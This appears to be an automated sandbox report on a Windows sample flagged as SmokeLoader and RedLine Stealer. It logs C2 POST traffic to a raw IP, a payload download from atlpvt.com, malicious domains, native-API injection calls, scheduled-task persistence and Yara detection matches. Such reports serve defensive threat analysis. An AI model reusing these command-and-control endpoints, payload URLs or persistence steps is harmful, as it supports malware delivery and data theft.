Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_0023BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 7_2_0023BD60
Source: global traffic HTTP traffic detected: GET /tmp/2.exe HTTP/1.1Host: atlpvt.com
Source: global traffic DNS traffic detected: DNS query: atlpvt.com
Source: global traffic DNS traffic detected: DNS query: yosoborno.com
Source: global traffic DNS traffic detected: DNS query: wshcnsd.xyz
Source: global traffic DNS traffic detected: DNS query: nusdhj.ws
Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: axplong.exe, 00000007.00000002.3273525737.0000000001308000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3273525737.000000000126E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#
Source: axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
Source: axplong.exe, 00000007.00000002.3273525737.000000000121B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php?
Source: axplong.exe, 00000007.00000002.3273525737.0000000001288000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpTemp
Source: axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcoded
Source: axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2785361749.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000009.00000000.2781222412.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2785361749.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2785361749.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ionhrtuxphot.net/
Source: explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ionhrtuxphot.net/z/
Source: explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://nusdhj.ws/
Source: explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://nusdhj.ws:80/tmp//
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2785361749.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000009.00000000.2785361749.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000009.00000000.2784251852.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2784734519.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2784700716.0000000008870000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://wshcnsd.xyz/
Source: explorer.exe, 00000009.00000003.3096160513.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2790128261.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000009.00000003.3095335436.0000000003531000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://yosoborno.com:80/tmp/3
Source: explorer.exe, 00000009.00000003.3096295760.000000000C513000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2788512315.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000009.00000000.2783388537.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000000.2785361749.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000000.2783388537.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000003.3094724736.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2782356974.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atlpvt.com/
Source: axplong.exe, 00000007.00000003.2705138953.00000000012A9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3273525737.000000000126E000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atlpvt.com/tmp/2.exe
Source: axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atlpvt.com/tmp/2.exe(mh
Source: axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atlpvt.com/tmp/2.exe6mv
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000009.00000000.2785361749.0000000009D42000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000009.00000000.2788512315.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000009.00000000.2785361749.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000009.00000000.2785361749.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 58.65.168.132:443 -> 192.168.2.5:49713 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.2807030321.000000000247D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2807137209.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.3041945625.000000000248D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.3042190062.0000000004080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
PE file contains section with special chars
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_00402FA2 RtlCreateUserThread,NtTerminateProcess, 8_2_00402FA2
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_00401502 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 8_2_00401502
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 8_2_004014ED
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_00402FA2 RtlCreateUserThread,NtTerminateProcess, 10_2_00402FA2
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_00401502 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 10_2_00401502
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 10_2_004014ED
Creates files inside the system directory
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_0023E440 7_2_0023E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00273068 7_2_00273068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00234CF0 7_2_00234CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00267D83 7_2_00267D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_0027765B 7_2_0027765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00234AF0 7_2_00234AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00278720 7_2_00278720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00276F09 7_2_00276F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_0027777B 7_2_0027777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00272BD0 7_2_00272BD0
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_0040208D 8_2_0040208D
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_0040208D 10_2_0040208D
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe 78305C8B5E8EAD6989A0AF09FC6ED8F2FF1B246C0487DFA78FB5B155B554CAE9
Uses 32bit PE files
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000008.00000002.2807030321.000000000247D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2807137209.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
